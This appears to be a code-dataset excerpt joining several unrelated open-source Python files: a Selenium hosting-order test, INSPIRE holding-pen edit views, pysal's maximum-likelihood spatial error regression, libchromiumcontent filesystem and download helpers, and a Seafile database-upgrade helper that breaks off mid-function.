add_to_builtins('django.template.loader_tags')
| bsd-3-clause | -7,761,802,182,906,491,000 | -7,098,664,297,805,954,000 | 39.570707 | 207 | 0.685298 | false |
StanislavQA/python_task | timeweb2.py | 1 | 2037 | # -*- coding: utf-8 -*-
from selenium.webdriver.firefox.webdriver import WebDriver
import unittest
def is_alert_present(wd):
try:
wd.switch_to_alert().text
return True
except:
return False
class timeweb2(unittest.TestCase):
def setUp(self):
self.wd = WebDriver()
self.wd.implicitly_wait(60)
def test_timeweb2(self):
wd = self.wd
self.open_home_page(wd)
self.tariff_plan(wd)
self.login(wd, username = "Чернядьева Анна Константиновна", email = "[email protected]")
def login(self, wd, username, email):
wd.find_element_by_xpath(
"//div[@class='overlay']/div/div/div[14]/form/div[2]/div[1]/div[2]/div[2]/input").click()
wd.find_element_by_xpath(
"//div[@class='overlay']/div/div/div[14]/form/div[2]/div[1]/div[2]/div[2]/input").clear()
wd.find_element_by_xpath(
"//div[@class='overlay']/div/div/div[14]/form/div[2]/div[1]/div[2]/div[2]/input").send_keys(
username)
wd.find_element_by_name("email").click()
wd.find_element_by_name("email").clear()
wd.find_element_by_name("email").send_keys(email)
wd.find_element_by_xpath("//label[@for='c4']").click()
if not wd.find_element_by_id("c4").is_selected():
wd.find_element_by_id("c4").click()
wd.find_element_by_link_text("ЗАКАЗАТЬ").click()
def tariff_plan(self, wd):
wd.find_element_by_link_text("ХОСТИНГ").click()
wd.find_element_by_link_text("РАЗМЕСТИТЬ САЙТ").click()
wd.find_element_by_css_selector("li.item.selected").click()
def open_home_page(self, wd):
wd.get("https://timeweb.com/ru/")
# Check for compliance with the selected plan
    def check_exists_by_link_text(self, link_text="Year+"):
        return len(self.wd.find_elements_by_link_text(link_text)) > 0
def tearDown(self):
self.wd.quit()
if __name__ == '__main__':
unittest.main()
| apache-2.0 | -3,668,871,174,778,105,300 | -6,991,801,999,901,373,000 | 35 | 104 | 0.599495 | false |
Lilykos/inspire-next | inspire/modules/workflows/views/holdingpen_edit.py | 1 | 3372 | # -*- coding: utf-8 -*-
#
# This file is part of INSPIRE.
# Copyright (C) 2015 CERN.
#
# INSPIRE is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# INSPIRE is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with INSPIRE; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
from six import text_type
from flask import Blueprint, jsonify, request
from flask_login import login_required
from harvestingkit.html_utils import MathMLParser
from invenio.base.decorators import wash_arguments
from invenio.ext.principal import permission_required
from invenio.modules.workflows.acl import viewholdingpen
from invenio.modules.workflows.models import BibWorkflowObject
blueprint = Blueprint(
'inspire_holdingpen',
__name__,
url_prefix="/admin/holdingpen",
template_folder='../templates',
static_folder="../static",
)
# Constants
SUBJECT_TERM = "subject_term"
TERM = "term"
SCHEME = "scheme"
INSPIRE_SCHEME = "INSPIRE"
# Fields
SUBJECT_FIELD = "subject_term.term"
TITLE_FIELD = "title.title"
@blueprint.route('/edit_record_title', methods=['POST'])
@login_required
@permission_required(viewholdingpen.name)
@wash_arguments({'value': (text_type, ""),
'objectid': (int, 0)})
def edit_record_title(value, objectid):
editable_obj = BibWorkflowObject.query.get(objectid)
data = editable_obj.get_data()
data[TITLE_FIELD] = MathMLParser.html_to_text(value)
editable_obj.set_data(data)
editable_obj.save()
return jsonify({
"category": "success",
"message": "Edit on title was successful"
})
@blueprint.route('/edit_record_subject', methods=['POST'])
@login_required
@permission_required(viewholdingpen.name)
@wash_arguments({'objectid': (text_type, "")})
def edit_record_subject(objectid):
editable_obj = BibWorkflowObject.query.get(objectid)
data = editable_obj.get_data()
old_subjects_list = data[SUBJECT_FIELD]
new_subjects_list = request.values.getlist('subjects[]') or []
# We will use a diff method to find which
# subjects to remove and which to add.
# PLUS removes unicode
to_remove = [str(x) for x in list(set(old_subjects_list) - set(new_subjects_list))]
to_add = [str(x) for x in list(set(new_subjects_list) - set(old_subjects_list))]
# Make a copy of the original list
subject_objects = []
subject_objects.extend(data[SUBJECT_TERM])
# Remove subjects
subject_objects = [subj for subj in subject_objects
                       if subj[TERM] not in to_remove]
# Add the new subjects
for subj in to_add:
subject_objects.append({
TERM: subj,
SCHEME: INSPIRE_SCHEME
})
data[SUBJECT_TERM] = subject_objects
editable_obj.set_data(data)
editable_obj.save()
return jsonify({
"category": "success",
"message": "Edit on subjects was successful"
})
| gpl-2.0 | -4,695,978,596,771,673,000 | -752,599,306,971,032,300 | 30.222222 | 87 | 0.694247 | false |
ljwolf/pysal | pysal/spreg/ml_error.py | 6 | 19663 | """
ML Estimation of Spatial Error Model
"""
__author__ = "Luc Anselin [email protected],\
Serge Rey [email protected], \
Levi Wolf [email protected]"
import numpy as np
import numpy.linalg as la
from scipy import sparse as sp
from scipy.sparse.linalg import splu as SuperLU
import pysal as ps
from utils import RegressionPropsY, RegressionPropsVM
import diagnostics as DIAG
import user_output as USER
import summary_output as SUMMARY
import regimes as REGI
from w_utils import symmetrize
try:
from scipy.optimize import minimize_scalar
minimize_scalar_available = True
except ImportError:
minimize_scalar_available = False
from .sputils import spdot, spfill_diagonal, spinv
__all__ = ["ML_Error"]
class BaseML_Error(RegressionPropsY, RegressionPropsVM, REGI.Regimes_Frame):
"""
ML estimation of the spatial error model (note no consistency
checks, diagnostics or constants added); Anselin (1988) [Anselin1988]_
Parameters
----------
y : array
nx1 array for dependent variable
x : array
Two dimensional array with n rows and one column for each
independent (exogenous) variable, excluding the constant
w : Sparse matrix
Spatial weights sparse matrix
method : string
if 'full', brute force calculation (full matrix expressions)
if 'ord', Ord eigenvalue calculation
if 'LU', LU decomposition for sparse matrices
epsilon : float
                   tolerance criterion in minimize_scalar function and inverse_product
regimes_att : dictionary
Dictionary containing elements to be used in case of a regimes model,
i.e. 'x' before regimes, 'regimes' list and 'cols2regi'
Attributes
----------
betas : array
kx1 array of estimated coefficients
lam : float
estimate of spatial autoregressive coefficient
u : array
nx1 array of residuals
e_filtered : array
spatially filtered residuals
predy : array
nx1 array of predicted y values
n : integer
Number of observations
k : integer
Number of variables for which coefficients are estimated
                   (including the constant, excluding lambda)
y : array
nx1 array for dependent variable
x : array
Two dimensional array with n rows and one column for each
independent (exogenous) variable, including the constant
method : string
log Jacobian method
if 'full': brute force (full matrix computations)
if 'ord' : Ord eigenvalue method
epsilon : float
tolerance criterion used in minimize_scalar function and inverse_product
mean_y : float
Mean of dependent variable
std_y : float
Standard deviation of dependent variable
vm : array
Variance covariance matrix (k+1 x k+1) - includes lambda
vm1 : array
2x2 array of variance covariance for lambda, sigma
sig2 : float
Sigma squared used in computations
logll : float
maximized log-likelihood (including constant terms)
Examples
--------
>>> import numpy as np
>>> import pysal as ps
>>> np.set_printoptions(suppress=True) #prevent scientific format
>>> db = ps.open(ps.examples.get_path("south.dbf"),'r')
>>> y_name = "HR90"
>>> y = np.array(db.by_col(y_name))
>>> y.shape = (len(y),1)
>>> x_names = ["RD90","PS90","UE90","DV90"]
>>> x = np.array([db.by_col(var) for var in x_names]).T
>>> x = np.hstack((np.ones((len(y),1)),x))
>>> ww = ps.open(ps.examples.get_path("south_q.gal"))
>>> w = ww.read()
>>> ww.close()
>>> w.transform = 'r'
>>> mlerr = BaseML_Error(y,x,w) #doctest: +SKIP
>>> "{0:.6f}".format(mlerr.lam) #doctest: +SKIP
'0.299078'
>>> np.around(mlerr.betas, decimals=4) #doctest: +SKIP
array([[ 6.1492],
[ 4.4024],
[ 1.7784],
[-0.3781],
[ 0.4858],
[ 0.2991]])
>>> "{0:.6f}".format(mlerr.mean_y) #doctest: +SKIP
'9.549293'
>>> "{0:.6f}".format(mlerr.std_y) #doctest: +SKIP
'7.038851'
>>> np.diag(mlerr.vm) #doctest: +SKIP
array([ 1.06476526, 0.05548248, 0.04544514, 0.00614425, 0.01481356,
0.00143001])
>>> "{0:.6f}".format(mlerr.sig2[0][0]) #doctest: +SKIP
'32.406854'
>>> "{0:.6f}".format(mlerr.logll) #doctest: +SKIP
'-4471.407067'
>>> mlerr1 = BaseML_Error(y,x,w,method='ord') #doctest: +SKIP
>>> "{0:.6f}".format(mlerr1.lam) #doctest: +SKIP
'0.299078'
>>> np.around(mlerr1.betas, decimals=4) #doctest: +SKIP
array([[ 6.1492],
[ 4.4024],
[ 1.7784],
[-0.3781],
[ 0.4858],
[ 0.2991]])
>>> "{0:.6f}".format(mlerr1.mean_y) #doctest: +SKIP
'9.549293'
>>> "{0:.6f}".format(mlerr1.std_y) #doctest: +SKIP
'7.038851'
>>> np.around(np.diag(mlerr1.vm), decimals=4) #doctest: +SKIP
array([ 1.0648, 0.0555, 0.0454, 0.0061, 0.0148, 0.0014])
>>> "{0:.4f}".format(mlerr1.sig2[0][0]) #doctest: +SKIP
'32.4069'
>>> "{0:.4f}".format(mlerr1.logll) #doctest: +SKIP
'-4471.4071'
"""
def __init__(self, y, x, w, method='full', epsilon=0.0000001, regimes_att=None):
# set up main regression variables and spatial filters
self.y = y
if regimes_att:
self.x = x.toarray()
else:
self.x = x
self.n, self.k = self.x.shape
self.method = method
self.epsilon = epsilon
#W = w.full()[0] #wait to build pending what is needed
#Wsp = w.sparse
ylag = ps.lag_spatial(w, self.y)
xlag = self.get_x_lag(w, regimes_att)
# call minimizer using concentrated log-likelihood to get lambda
methodML = method.upper()
if methodML in ['FULL', 'LU', 'ORD']:
if methodML == 'FULL':
W = w.full()[0] # need dense here
res = minimize_scalar(err_c_loglik, 0.0, bounds=(-1.0, 1.0),
args=(self.n, self.y, ylag, self.x,
xlag, W), method='bounded',
tol=epsilon)
elif methodML == 'LU':
I = sp.identity(w.n)
Wsp = w.sparse # need sparse here
res = minimize_scalar(err_c_loglik_sp, 0.0, bounds=(-1.0,1.0),
args=(self.n, self.y, ylag,
self.x, xlag, I, Wsp),
method='bounded', tol=epsilon)
W = Wsp
elif methodML == 'ORD':
# check on symmetry structure
if w.asymmetry(intrinsic=False) == []:
ww = symmetrize(w)
WW = np.array(ww.todense())
evals = la.eigvalsh(WW)
W = WW
else:
W = w.full()[0] # need dense here
evals = la.eigvals(W)
res = minimize_scalar(
err_c_loglik_ord, 0.0, bounds=(-1.0, 1.0),
args=(self.n, self.y, ylag, self.x,
xlag, evals), method='bounded',
tol=epsilon)
else:
raise Exception("{0} is an unsupported method".format(method))
self.lam = res.x
# compute full log-likelihood, including constants
ln2pi = np.log(2.0 * np.pi)
llik = -res.fun - self.n / 2.0 * ln2pi - self.n / 2.0
self.logll = llik
# b, residuals and predicted values
ys = self.y - self.lam * ylag
xs = self.x - self.lam * xlag
xsxs = np.dot(xs.T, xs)
xsxsi = np.linalg.inv(xsxs)
xsys = np.dot(xs.T, ys)
b = np.dot(xsxsi, xsys)
self.betas = np.vstack((b, self.lam))
self.u = y - np.dot(self.x, b)
self.predy = self.y - self.u
# residual variance
self.e_filtered = self.u - self.lam * ps.lag_spatial(w, self.u)
self.sig2 = np.dot(self.e_filtered.T, self.e_filtered) / self.n
# variance-covariance matrix betas
varb = self.sig2 * xsxsi
# variance-covariance matrix lambda, sigma
a = -self.lam * W
spfill_diagonal(a, 1.0)
ai = spinv(a)
wai = spdot(W, ai)
tr1 = wai.diagonal().sum()
wai2 = spdot(wai, wai)
tr2 = wai2.diagonal().sum()
waiTwai = spdot(wai.T, wai)
tr3 = waiTwai.diagonal().sum()
v1 = np.vstack((tr2 + tr3,
tr1 / self.sig2))
v2 = np.vstack((tr1 / self.sig2,
self.n / (2.0 * self.sig2 ** 2)))
v = np.hstack((v1, v2))
self.vm1 = np.linalg.inv(v)
# create variance matrix for beta, lambda
vv = np.hstack((varb, np.zeros((self.k, 1))))
vv1 = np.hstack(
(np.zeros((1, self.k)), self.vm1[0, 0] * np.ones((1, 1))))
self.vm = np.vstack((vv, vv1))
def get_x_lag(self, w, regimes_att):
if regimes_att:
xlag = ps.lag_spatial(w, regimes_att['x'])
xlag = REGI.Regimes_Frame.__init__(self, xlag,
regimes_att['regimes'], constant_regi=None, cols2regi=regimes_att['cols2regi'])[0]
xlag = xlag.toarray()
else:
xlag = ps.lag_spatial(w, self.x)
return xlag
class ML_Error(BaseML_Error):
"""
    ML estimation of the spatial error model with all results and diagnostics;
Anselin (1988) [Anselin1988]_
Parameters
----------
y : array
nx1 array for dependent variable
x : array
Two dimensional array with n rows and one column for each
independent (exogenous) variable, excluding the constant
w : Sparse matrix
Spatial weights sparse matrix
method : string
if 'full', brute force calculation (full matrix expressions)
if 'ord', Ord eigenvalue method
if 'LU', LU sparse matrix decomposition
epsilon : float
                   tolerance criterion in minimize_scalar function and inverse_product
spat_diag : boolean
if True, include spatial diagnostics
vm : boolean
if True, include variance-covariance matrix in summary
results
name_y : string
Name of dependent variable for use in output
name_x : list of strings
Names of independent variables for use in output
name_w : string
Name of weights matrix for use in output
name_ds : string
Name of dataset for use in output
Attributes
----------
betas : array
(k+1)x1 array of estimated coefficients (rho first)
lam : float
estimate of spatial autoregressive coefficient
u : array
nx1 array of residuals
e_filtered : array
nx1 array of spatially filtered residuals
predy : array
nx1 array of predicted y values
n : integer
Number of observations
k : integer
Number of variables for which coefficients are estimated
(including the constant, excluding lambda)
y : array
nx1 array for dependent variable
x : array
Two dimensional array with n rows and one column for each
independent (exogenous) variable, including the constant
method : string
log Jacobian method
if 'full': brute force (full matrix computations)
epsilon : float
tolerance criterion used in minimize_scalar function and inverse_product
mean_y : float
Mean of dependent variable
std_y : float
Standard deviation of dependent variable
varb : array
Variance covariance matrix (k+1 x k+1) - includes var(lambda)
vm1 : array
variance covariance matrix for lambda, sigma (2 x 2)
sig2 : float
Sigma squared used in computations
logll : float
maximized log-likelihood (including constant terms)
pr2 : float
Pseudo R squared (squared correlation between y and ypred)
utu : float
Sum of squared residuals
std_err : array
1xk array of standard errors of the betas
z_stat : list of tuples
z statistic; each tuple contains the pair (statistic,
p-value), where each is a float
name_y : string
Name of dependent variable for use in output
name_x : list of strings
Names of independent variables for use in output
name_w : string
Name of weights matrix for use in output
name_ds : string
Name of dataset for use in output
title : string
Name of the regression method used
Examples
--------
>>> import numpy as np
>>> import pysal as ps
>>> np.set_printoptions(suppress=True) #prevent scientific format
>>> db = ps.open(ps.examples.get_path("south.dbf"),'r')
>>> ds_name = "south.dbf"
>>> y_name = "HR90"
>>> y = np.array(db.by_col(y_name))
>>> y.shape = (len(y),1)
>>> x_names = ["RD90","PS90","UE90","DV90"]
>>> x = np.array([db.by_col(var) for var in x_names]).T
>>> ww = ps.open(ps.examples.get_path("south_q.gal"))
>>> w = ww.read()
>>> ww.close()
>>> w_name = "south_q.gal"
>>> w.transform = 'r'
>>> mlerr = ML_Error(y,x,w,name_y=y_name,name_x=x_names,\
name_w=w_name,name_ds=ds_name) #doctest: +SKIP
>>> np.around(mlerr.betas, decimals=4) #doctest: +SKIP
array([[ 6.1492],
[ 4.4024],
[ 1.7784],
[-0.3781],
[ 0.4858],
[ 0.2991]])
>>> "{0:.4f}".format(mlerr.lam) #doctest: +SKIP
'0.2991'
>>> "{0:.4f}".format(mlerr.mean_y) #doctest: +SKIP
'9.5493'
>>> "{0:.4f}".format(mlerr.std_y) #doctest: +SKIP
'7.0389'
>>> np.around(np.diag(mlerr.vm), decimals=4) #doctest: +SKIP
array([ 1.0648, 0.0555, 0.0454, 0.0061, 0.0148, 0.0014])
>>> np.around(mlerr.sig2, decimals=4) #doctest: +SKIP
array([[ 32.4069]])
>>> "{0:.4f}".format(mlerr.logll) #doctest: +SKIP
'-4471.4071'
>>> "{0:.4f}".format(mlerr.aic) #doctest: +SKIP
'8952.8141'
>>> "{0:.4f}".format(mlerr.schwarz) #doctest: +SKIP
'8979.0779'
>>> "{0:.4f}".format(mlerr.pr2) #doctest: +SKIP
'0.3058'
>>> "{0:.4f}".format(mlerr.utu) #doctest: +SKIP
'48534.9148'
>>> np.around(mlerr.std_err, decimals=4) #doctest: +SKIP
array([ 1.0319, 0.2355, 0.2132, 0.0784, 0.1217, 0.0378])
>>> np.around(mlerr.z_stat, decimals=4) #doctest: +SKIP
array([[ 5.9593, 0. ],
[ 18.6902, 0. ],
[ 8.3422, 0. ],
[ -4.8233, 0. ],
[ 3.9913, 0.0001],
[ 7.9089, 0. ]])
>>> mlerr.name_y #doctest: +SKIP
'HR90'
>>> mlerr.name_x #doctest: +SKIP
['CONSTANT', 'RD90', 'PS90', 'UE90', 'DV90', 'lambda']
>>> mlerr.name_w #doctest: +SKIP
'south_q.gal'
>>> mlerr.name_ds #doctest: +SKIP
'south.dbf'
>>> mlerr.title #doctest: +SKIP
'MAXIMUM LIKELIHOOD SPATIAL ERROR (METHOD = FULL)'
"""
def __init__(self, y, x, w, method='full', epsilon=0.0000001,
spat_diag=False, vm=False, name_y=None, name_x=None,
name_w=None, name_ds=None):
n = USER.check_arrays(y, x)
USER.check_y(y, n)
USER.check_weights(w, y, w_required=True)
x_constant = USER.check_constant(x)
method = method.upper()
BaseML_Error.__init__(self, y=y, x=x_constant,
w=w, method=method, epsilon=epsilon)
self.title = "MAXIMUM LIKELIHOOD SPATIAL ERROR" + \
" (METHOD = " + method + ")"
self.name_ds = USER.set_name_ds(name_ds)
self.name_y = USER.set_name_y(name_y)
self.name_x = USER.set_name_x(name_x, x)
self.name_x.append('lambda')
self.name_w = USER.set_name_w(name_w, w)
self.aic = DIAG.akaike(reg=self)
self.schwarz = DIAG.schwarz(reg=self)
SUMMARY.ML_Error(reg=self, w=w, vm=vm, spat_diag=spat_diag)
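# Note on the helpers below: each returns the *negative* of the concentrated
# log-likelihood, which minimize_scalar then minimizes over lambda.  As a
# sketch of the standard result (Anselin 1988), with
#     e(lambda) = (I - lambda*W) * (y - X*b)
# the concentrated function is
#     L_c(lambda) = -(n/2) * log(sigma2(lambda)) + log|I - lambda*W|
# and the three variants differ only in how the log-Jacobian log|I - lambda*W|
# is evaluated: dense determinant ('full'), sparse LU factorization ('LU'), or
# Ord's eigenvalue method ('ord').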
def err_c_loglik(lam, n, y, ylag, x, xlag, W):
# concentrated log-lik for error model, no constants, brute force
ys = y - lam * ylag
xs = x - lam * xlag
ysys = np.dot(ys.T, ys)
xsxs = np.dot(xs.T, xs)
xsxsi = np.linalg.inv(xsxs)
xsys = np.dot(xs.T, ys)
x1 = np.dot(xsxsi, xsys)
x2 = np.dot(xsys.T, x1)
ee = ysys - x2
sig2 = ee[0][0] / n
nlsig2 = (n / 2.0) * np.log(sig2)
a = -lam * W
np.fill_diagonal(a, 1.0)
jacob = np.log(np.linalg.det(a))
# this is the negative of the concentrated log lik for minimization
clik = nlsig2 - jacob
return clik
def err_c_loglik_sp(lam, n, y, ylag, x, xlag, I, Wsp):
# concentrated log-lik for error model, no constants, LU
if isinstance(lam, np.ndarray):
if lam.shape == (1,1):
lam = lam[0][0] #why does the interior value change?
ys = y - lam * ylag
xs = x - lam * xlag
ysys = np.dot(ys.T, ys)
xsxs = np.dot(xs.T, xs)
xsxsi = np.linalg.inv(xsxs)
xsys = np.dot(xs.T, ys)
x1 = np.dot(xsxsi, xsys)
x2 = np.dot(xsys.T, x1)
ee = ysys - x2
sig2 = ee[0][0] / n
nlsig2 = (n / 2.0) * np.log(sig2)
a = I - lam * Wsp
LU = SuperLU(a.tocsc())
jacob = np.sum(np.log(np.abs(LU.U.diagonal())))
# this is the negative of the concentrated log lik for minimization
clik = nlsig2 - jacob
return clik
def err_c_loglik_ord(lam, n, y, ylag, x, xlag, evals):
# concentrated log-lik for error model, no constants, eigenvalues
ys = y - lam * ylag
xs = x - lam * xlag
ysys = np.dot(ys.T, ys)
xsxs = np.dot(xs.T, xs)
xsxsi = np.linalg.inv(xsxs)
xsys = np.dot(xs.T, ys)
x1 = np.dot(xsxsi, xsys)
x2 = np.dot(xsys.T, x1)
ee = ysys - x2
sig2 = ee[0][0] / n
nlsig2 = (n / 2.0) * np.log(sig2)
revals = lam * evals
jacob = np.log(1 - revals).sum()
if isinstance(jacob, complex):
jacob = jacob.real
# this is the negative of the concentrated log lik for minimization
clik = nlsig2 - jacob
return clik
def _test():
import doctest
start_suppress = np.get_printoptions()['suppress']
np.set_printoptions(suppress=True)
doctest.testmod()
np.set_printoptions(suppress=start_suppress)
| bsd-3-clause | 8,266,917,768,889,439,000 | 6,212,989,230,600,351,000 | 35.480519 | 129 | 0.525556 | false |
electron/libchromiumcontent | script/lib/filesystem.py | 2 | 1582 | """Filesystem related helper functions.
"""
import contextlib
import errno
import os
import shutil
import sys
import tarfile
import tempfile
import urllib2
def mkdir_p(path):
try:
os.makedirs(path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def rm_f(path):
try:
os.remove(path)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def rm_rf(path):
try:
shutil.rmtree(path)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def safe_unlink(path):
try:
os.unlink(path)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def byte_to_mb(n):
return str(n / 1024 / 1024) + 'MB'
def download_and_extract(destination, url, verbose):
print url
with tempfile.TemporaryFile() as t:
with contextlib.closing(urllib2.urlopen(url)) as u:
total = int(u.headers['content-length'])
done = 0
last_length = 0
while True:
chunk = u.read(1024*1024)
done += len(chunk)
if not len(chunk):
break
if verbose:
percent = '{0:.2f}%'.format(round(float(done) / float(total), 4) * 100)
ratio = '(' + byte_to_mb(done) + '/' + byte_to_mb(total) + ')'
line = '-> ' + percent + ' ' + ratio
sys.stderr.write(line.ljust(last_length) + '\r')
last_length = len(line)
sys.stderr.flush()
t.write(chunk)
if verbose:
sys.stderr.write('\nExtracting...\n')
sys.stderr.flush()
with tarfile.open(fileobj=t, mode='r:bz2') as z:
z.extractall(destination)
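# Example usage (hypothetical URL and destination, for illustration only); the
# archive is expected to be a bzip2-compressed tarball, as implied by 'r:bz2':
#   download_and_extract('/tmp/contents', 'https://example.com/archive.tar.bz2', verbose=True)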
| mit | 4,223,597,497,163,345,000 | -606,217,430,883,453,800 | 20.972222 | 81 | 0.59292 | false |
sharpdeep/seafile | scripts/upgrade/db_update_helper.py | 18 | 10798 | #coding: UTF-8
import sys
import os
import ConfigParser
import glob
HAS_MYSQLDB = True
try:
import MySQLdb
except ImportError:
HAS_MYSQLDB = False
HAS_SQLITE3 = True
try:
import sqlite3
except ImportError:
HAS_SQLITE3 = False
class EnvManager(object):
def __init__(self):
self.upgrade_dir = os.path.dirname(__file__)
self.install_path = os.path.dirname(self.upgrade_dir)
self.top_dir = os.path.dirname(self.install_path)
self.ccnet_dir = os.environ['CCNET_CONF_DIR']
self.seafile_dir = os.environ['SEAFILE_CONF_DIR']
env_mgr = EnvManager()
class Utils(object):
@staticmethod
def highlight(content, is_error=False):
'''Add ANSI color to content to get it highlighted on terminal'''
if is_error:
return '\x1b[1;31m%s\x1b[m' % content
else:
return '\x1b[1;32m%s\x1b[m' % content
@staticmethod
def info(msg):
print Utils.highlight('[INFO] ') + msg
@staticmethod
def error(msg):
print Utils.highlight('[ERROR] ') + msg
sys.exit(1)
@staticmethod
def read_config(config_path, defaults):
cp = ConfigParser.ConfigParser(defaults)
cp.read(config_path)
return cp
class MySQLDBInfo(object):
def __init__(self, host, port, username, password, db, unix_socket=None):
self.host = host
self.port = port
self.username = username
self.password = password
self.db = db
self.unix_socket = unix_socket
class DBUpdater(object):
def __init__(self, version, name):
self.sql_dir = os.path.join(env_mgr.upgrade_dir, 'sql', version, name)
@staticmethod
def get_instance(version):
'''Detect whether we are using mysql or sqlite3'''
ccnet_db_info = DBUpdater.get_ccnet_mysql_info()
seafile_db_info = DBUpdater.get_seafile_mysql_info()
seahub_db_info = DBUpdater.get_seahub_mysql_info()
if ccnet_db_info and seafile_db_info and seahub_db_info:
Utils.info('You are using MySQL')
if not HAS_MYSQLDB:
Utils.error('Python MySQLdb module is not found')
updater = MySQLDBUpdater(version, ccnet_db_info, seafile_db_info, seahub_db_info)
elif (ccnet_db_info is None) and (seafile_db_info is None) and (seahub_db_info is None):
Utils.info('You are using SQLite3')
if not HAS_SQLITE3:
Utils.error('Python sqlite3 module is not found')
updater = SQLiteDBUpdater(version)
else:
def to_db_string(info):
if info is None:
return 'SQLite3'
else:
return 'MySQL'
Utils.error('Error:\n ccnet is using %s\n seafile is using %s\n seahub is using %s\n'
% (to_db_string(ccnet_db_info),
to_db_string(seafile_db_info),
to_db_string(seahub_db_info)))
return updater
def update_db(self):
ccnet_sql = os.path.join(self.sql_dir, 'ccnet.sql')
seafile_sql = os.path.join(self.sql_dir, 'seafile.sql')
seahub_sql = os.path.join(self.sql_dir, 'seahub.sql')
if os.path.exists(ccnet_sql):
Utils.info('updating ccnet database...')
self.update_ccnet_sql(ccnet_sql)
if os.path.exists(seafile_sql):
Utils.info('updating seafile database...')
self.update_seafile_sql(seafile_sql)
if os.path.exists(seahub_sql):
Utils.info('updating seahub database...')
self.update_seahub_sql(seahub_sql)
@staticmethod
def get_ccnet_mysql_info():
ccnet_conf = os.path.join(env_mgr.ccnet_dir, 'ccnet.conf')
defaults = {
'HOST': '127.0.0.1',
'PORT': '3306',
'UNIX_SOCKET': '',
}
config = Utils.read_config(ccnet_conf, defaults)
db_section = 'Database'
if not config.has_section(db_section):
return None
type = config.get(db_section, 'ENGINE')
if type != 'mysql':
return None
try:
host = config.get(db_section, 'HOST')
port = config.getint(db_section, 'PORT')
username = config.get(db_section, 'USER')
password = config.get(db_section, 'PASSWD')
db = config.get(db_section, 'DB')
unix_socket = config.get(db_section, 'UNIX_SOCKET')
except ConfigParser.NoOptionError, e:
Utils.error('Database config in ccnet.conf is invalid: %s' % e)
info = MySQLDBInfo(host, port, username, password, db, unix_socket)
return info
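    # For reference, the ccnet.conf section parsed above looks roughly like the
    # sketch below (values are illustrative placeholders, not real credentials):
    #
    #   [Database]
    #   ENGINE = mysql
    #   HOST = 127.0.0.1
    #   PORT = 3306
    #   USER = seafile
    #   PASSWD = secret
    #   DB = ccnet-db
    #   UNIX_SOCKET =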
@staticmethod
def get_seafile_mysql_info():
seafile_conf = os.path.join(env_mgr.seafile_dir, 'seafile.conf')
defaults = {
'HOST': '127.0.0.1',
'PORT': '3306',
'UNIX_SOCKET': '',
}
config = Utils.read_config(seafile_conf, defaults)
db_section = 'database'
if not config.has_section(db_section):
return None
type = config.get(db_section, 'type')
if type != 'mysql':
return None
try:
host = config.get(db_section, 'host')
port = config.getint(db_section, 'port')
username = config.get(db_section, 'user')
password = config.get(db_section, 'password')
db = config.get(db_section, 'db_name')
unix_socket = config.get(db_section, 'unix_socket')
except ConfigParser.NoOptionError, e:
Utils.error('Database config in seafile.conf is invalid: %s' % e)
info = MySQLDBInfo(host, port, username, password, db, unix_socket)
return info
@staticmethod
def get_seahub_mysql_info():
sys.path.insert(0, env_mgr.top_dir)
try:
import seahub_settings # pylint: disable=F0401
except ImportError, e:
Utils.error('Failed to import seahub_settings.py: %s' % e)
if not hasattr(seahub_settings, 'DATABASES'):
return None
try:
d = seahub_settings.DATABASES['default']
if d['ENGINE'] != 'django.db.backends.mysql':
return None
host = d.get('HOST', '127.0.0.1')
port = int(d.get('PORT', 3306))
username = d['USER']
password = d['PASSWORD']
db = d['NAME']
unix_socket = host if host.startswith('/') else None
except KeyError:
Utils.error('Database config in seahub_settings.py is invalid: %s' % e)
info = MySQLDBInfo(host, port, username, password, db, unix_socket)
return info
def update_ccnet_sql(self, ccnet_sql):
raise NotImplementedError
def update_seafile_sql(self, seafile_sql):
raise NotImplementedError
def update_seahub_sql(self, seahub_sql):
raise NotImplementedError
class CcnetSQLiteDB(object):
def __init__(self, ccnet_dir):
self.ccnet_dir = ccnet_dir
def get_db(self, dbname):
dbs = (
'ccnet.db',
'GroupMgr/groupmgr.db',
'misc/config.db',
'OrgMgr/orgmgr.db',
)
for db in dbs:
if os.path.splitext(os.path.basename(db))[0] == dbname:
return os.path.join(self.ccnet_dir, db)
class SQLiteDBUpdater(DBUpdater):
def __init__(self, version):
DBUpdater.__init__(self, version, 'sqlite3')
self.ccnet_db = CcnetSQLiteDB(env_mgr.ccnet_dir)
self.seafile_db = os.path.join(env_mgr.seafile_dir, 'seafile.db')
self.seahub_db = os.path.join(env_mgr.top_dir, 'seahub.db')
def update_db(self):
super(SQLiteDBUpdater, self).update_db()
for sql_path in glob.glob(os.path.join(self.sql_dir, 'ccnet', '*.sql')):
self.update_ccnet_sql(sql_path)
def apply_sqls(self, db_path, sql_path):
with open(sql_path, 'r') as fp:
lines = fp.read().split(';')
with sqlite3.connect(db_path) as conn:
for line in lines:
line = line.strip()
if not line:
continue
else:
conn.execute(line)
def update_ccnet_sql(self, sql_path):
dbname = os.path.splitext(os.path.basename(sql_path))[0]
self.apply_sqls(self.ccnet_db.get_db(dbname), sql_path)
def update_seafile_sql(self, sql_path):
self.apply_sqls(self.seafile_db, sql_path)
def update_seahub_sql(self, sql_path):
self.apply_sqls(self.seahub_db, sql_path)
class MySQLDBUpdater(DBUpdater):
def __init__(self, version, ccnet_db_info, seafile_db_info, seahub_db_info):
DBUpdater.__init__(self, version, 'mysql')
self.ccnet_db_info = ccnet_db_info
self.seafile_db_info = seafile_db_info
self.seahub_db_info = seahub_db_info
def update_ccnet_sql(self, ccnet_sql):
self.apply_sqls(self.ccnet_db_info, ccnet_sql)
def update_seafile_sql(self, seafile_sql):
self.apply_sqls(self.seafile_db_info, seafile_sql)
def update_seahub_sql(self, seahub_sql):
self.apply_sqls(self.seahub_db_info, seahub_sql)
def get_conn(self, info):
kw = dict(
user=info.username,
passwd=info.password,
db=info.db,
)
if info.unix_socket:
